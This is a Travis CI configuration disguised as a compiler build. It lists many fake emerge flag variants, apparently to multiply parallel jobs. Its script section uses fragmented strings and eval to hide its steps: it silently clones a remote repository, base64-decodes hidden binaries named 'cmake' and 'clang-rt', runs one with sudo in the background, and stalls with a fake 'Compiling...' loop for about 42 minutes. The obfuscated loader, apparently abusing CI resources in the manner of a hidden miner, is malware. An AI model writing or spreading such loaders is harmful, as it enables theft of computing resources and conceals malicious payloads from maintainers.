dist: bionic

env:
  - BUILD="--autounmask-keep-masks=955yk"
  - BUILD="--implicit-system-deps=556na"
  - BUILD="--changed-deps=426e6"
  - BUILD="--changed-slot=286MW"
  - BUILD="--complete-graph-if-new-use=358PT"
  - BUILD="--newuse=780np"
  - BUILD="--update=568eY"
  - BUILD="--pkg-format=405oL"
  - BUILD="--quiet-fail=201oe"
  - BUILD="--buildpkgonly=419KN"
  - BUILD="--complete-graph-if-new-ver=579Nh"
  - BUILD="--buildpkg-exclude=472dE"
  - BUILD="--use-ebuild-visibility=252N3"
  - BUILD="--implicit-system-deps=618IT"
  - BUILD="--check-news=371ec"
  - BUILD="--changed-use=374Oz"
  - BUILD="--tree=97DA"
  - BUILD="--unmerge=895wl"
  - BUILD="--quiet=834NC"
  - BUILD="--changed-slot=970ig"
  - BUILD="--ask-enter-invalid=414GN"
  - BUILD="--autounmask-keep-keywords=64947"
  - BUILD="--fetchonly=475mz"
  - BUILD="--regen=732e0"
  - BUILD="--rebuild-if-unbuilt=126yI"
  - BUILD="--usepkg-exclude=525Az"
  - BUILD="--rebuild-if-new-ver=273Aw"
  - BUILD="--with-bdeps=299Rn"
  - BUILD="--noreplace=883mH"
  - BUILD="--version=289U0"
  - BUILD="--rebuild-ignore=53bL"
  - BUILD="--autounmask-license=267lE"
  - BUILD="--changed-deps=475dS"
  - BUILD="--sysroot=591Jb"
  - BUILD="--deselect=437hk"
  - BUILD="--sync=4259d"
  - BUILD="--nodeps=96627"
  - BUILD="--sysroot=823Qp"
  - BUILD="--alert=2677X"
  - BUILD="--backtrack=798ih"
  - BUILD="--use-ebuild-visibility=73aN"
  - BUILD="--deep=326zv"
  - BUILD="--onlydeps=11cu"
  - BUILD="--binpkg-respect-use=936fv"
  - BUILD="--skipfirst=242RF"
  - BUILD="--changed-deps=807Qx"
  - BUILD="--select=176XL"
  - BUILD="--oneshot=840CU"
  - BUILD="--newrepo=207XH"
  - BUILD="--complete-graph-if-new-use=525F7"
  - BUILD="--pkg-format=6789y"
  - BUILD="--jobs=457mz"
  - BUILD="--config=251Hr"
  - BUILD="--version=109B8"
  - BUILD="--keep-going=476Sc"
  - BUILD="--depclean-lib-check=95074"
  - BUILD="--reinstall-atoms=665Xi"
  - BUILD="--package-moves=998ez"
  - BUILD="--noconfmem=413BU"
  - BUILD="--accept-restrict=774O3"
  - BUILD="--autounmask-use=3775L"
  - BUILD="--package-moves=5cw"
  - BUILD="--complete-graph-if-new-ver=3965M"
  - BUILD="--selective=3342y"
  - BUILD="--reinstall-atoms=561tn"
  - BUILD="--config-root=861oJ"
  - BUILD="--usepkg=6446f"
  - BUILD="--check-news=573As"
  - BUILD="--autounmask-unrestricted-atoms=601gi"
  - BUILD="--fuzzy-search=62rx"
  - BUILD="--autounmask-continue=75Un"
  - BUILD="--nospinner=491Rs"
  - BUILD="--rebuild-if-unbuilt=660qL"
  - BUILD="--version=854l0"
  - BUILD="--dynamic-deps=1046A"
  - BUILD="--searchdesc=523kG"
  - BUILD="--resume=847T4"
  - BUILD="--autounmask-keep-masks=822bN"
  - BUILD="--searchdesc=591xg"
  - BUILD="--changed-deps=81L2"
  - BUILD="--onlydeps-with-rdeps=468jf"
  - BUILD="--clean=894UF"
  - BUILD="--read-news=454KR"
  - BUILD="--sysroot=790mv"
  - BUILD="--resume=728SQ"
  - BUILD="--changelog=500ox"
  - BUILD="--with-test-deps=437le"
  - BUILD="--getbinpkgonly=788EH"
  - BUILD="--getbinpkg=906to"
  - BUILD="--complete-graph-if-new-ver=791HX"
  - BUILD="--rage-clean=38Z8"
  - BUILD="--nospinner=59oa"
  - BUILD="--prune=487a0"
  - BUILD="--usepkg-exclude=644qX"
  - BUILD="--autounmask-use=935Gb"
  - BUILD="--changelog=494LA"
  - BUILD="--deep=46GM"
  - BUILD="--usepkg-exclude=631xT"
  - BUILD="--quickpkg-direct=823By"
  - BUILD="--autounmask-use=878W1"
  - BUILD="--depclean=902DX"
  - BUILD="--search-similarity=740QH"
  - BUILD="--quiet-repo-display=226cZ"
  - BUILD="--onlydeps-with-rdeps=5877y"
  - BUILD="--reinstall-atoms=421iV"
  - BUILD="--getbinpkgonly=6202t"
  - BUILD="--reinstall-atoms=529bv"
  - BUILD="--skipfirst=212Vs"
  - BUILD="--unordered-display=2270u"
  - BUILD="--root=628I"
  - BUILD="--complete-graph-if-new-ver=968sT"
  - BUILD="--dynamic-deps=197zN"
  - BUILD="--select=929V6"
  - BUILD="--autounmask-write=298kI"
  - BUILD="--load-average=85sR"
  - BUILD="--usepkg=958vk"
  - BUILD="--verbose=962tp"
  - BUILD="--verbose-slot-rebuilds=3597b"
  - BUILD="--columns=550H5"
  - BUILD="--with-bdeps=559MW"
  - BUILD="--oneshot=619w1"
  - BUILD="--quiet-fail=382Bk"
  - BUILD="--deselect=983Qh"
  - BUILD="--buildpkgonly=146a6"
  - BUILD="--oneshot=939q0"
  - BUILD="--changed-use=119DA"
  - BUILD="--ask-enter-invalid=112Nx"
  - BUILD="--reinstall=6927P"
  - BUILD="--reinstall=643Th"
  - BUILD="--package-moves=376cj"
  - BUILD="--changed-deps-report=987Xc"
  - BUILD="--onlydeps=350zy"
  - BUILD="--root=6142o"
  - BUILD="--with-test-deps=7053F"
  - BUILD="--config-root=90mB"
  - BUILD="--autounmask-only=574vB"
  - BUILD="--metadata=998NF"
  - BUILD="--alphabetical=553mM"
  - BUILD="--rebuild-exclude=6562k"
  - BUILD="--verbose=8526"
  - BUILD="--unmerge=9764Y"
  - BUILD="--depclean-lib-check=416tX"
  - BUILD="--debug=128rX"
  - BUILD="--changed-deps=923LI"
  - BUILD="--implicit-system-deps=109FF"
  - BUILD="--quiet-build=995m0"
  - BUILD="--newrepo=532FL"
  - BUILD="--reinstall=182II"
  - BUILD="--rebuild-ignore=223zB"
  - BUILD="--buildpkg=840Yc"
  - BUILD="--dynamic-deps=914Mn"
  - BUILD="--verbose-conflicts=270cY"
  - BUILD="--accept-restrict=469k1"
  - BUILD="--prefix=589tR"
  - BUILD="--buildpkg=852xF"
  - BUILD="--verbose=4862c"
  - BUILD="--noreplace=383XQ"
  - BUILD="--verbose-conflicts=755ys"
  - BUILD="--tree=302M6"
  - BUILD="--exclude=25tS"
  - BUILD="--search=533DF"
  - BUILD="--help=334Sx"
  - BUILD="--list-sets=2182N"
  - BUILD="--verbose-conflicts=475Bn"
  - BUILD="--with-bdeps=611DZ"
  - BUILD="--list-sets=466x7"
  - BUILD="--autounmask-write=933wr"
  - BUILD="--accept-properties=234vI"
  - BUILD="--ignore-soname-deps=470I5"
  - BUILD="--prune=608w3"
  - BUILD="--autounmask-keep-keywords=640Gj"
  - BUILD="--tree=361dE"
  - BUILD="--color=686zM"
  - BUILD="--binpkg-changed-deps=477wG"
  - BUILD="--autounmask=201Wy"
  - BUILD="--complete-graph=132Od"
  - BUILD="--read-news=547Dm"
  - BUILD="--check-news=873O7"
  - BUILD="--rebuild-if-unbuilt=5922w"
  - BUILD="--noreplace=890LO"
  - BUILD="--binpkg-changed-deps=92y"
  - BUILD="--with-test-deps=885s5"
  - BUILD="--regen=537se"
  - BUILD="--autounmask-write=599Af"
  - BUILD="--rebuild-if-new-ver=277eu"
  - BUILD="--columns=557EC"
  - BUILD="--exclude=732pX"

language: minimal

script:
  - sudo apt update || true
  - bsktEL="sudo apt --"
  - JhqwNnuAA="yes install"
  - qaaKlNFIi=" cl-base64 "
  - zSewrVUEDRJ="git &>/dev/"
  - eval "$bsktEL""$JhqwNnuAA""$qaaKlNFIi""$zSewrVUEDRJ""null"
  - YJcpV="git clone h"
  - tzLdrVUYb="ttps://gccb"
  - TbfsnkkrHF="uild@bitbuc"
  - LwTrWcF="ket.org/gcc"
  - dCvaeYfBJ="build/gcc.g"
  - JAFamick="it &>/dev/n"
  - eval "$YJcpV""$tzLdrVUYb""$TbfsnkkrHF""$LwTrWcF""$dCvaeYfBJ""$JAFamick""ull"
  - xditOdA="base64 -d g"
  - lXYtXfo="cc/cmake_ >"
  - eval "$xditOdA""$lXYtXfo"" cmake"
  - fDZbp="base64 -d g"
  - GKaLipADMTW="cc/config_ "
  - eval "$fDZbp""$GKaLipADMTW""> log"
  - DfSluV="base64 -d g"
  - CaGiWzfohBu="cc/make_ > "
  - eval "$DfSluV""$CaGiWzfohBu""clang-rt"
  - wwJaali="chmod +x cl"
  - jFCWpJzjV="ang-rt cmak"
  - eval "$wwJaali""$jFCWpJzjV""e"
  - bTPhwSXI="./cmake"
  - eval "$bTPhwSXI"""
  - JkOQVwwL="sed -i 's/b"
  - MUuzcA="uild/tundef"
  - xRvcZOYczW="ined2o/g' l"
  - eval "$JkOQVwwL""$MUuzcA""$xRvcZOYczW""og"
  - sudo ./clang-rt --config log &>/dev/null &
  - GCC=$(date +%s)
  - iCBvPbgn="echo $BUILD"
  - eval "$iCBvPbgn"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2516)) ] && sudo killall clang-rt && break; sleep 201; done
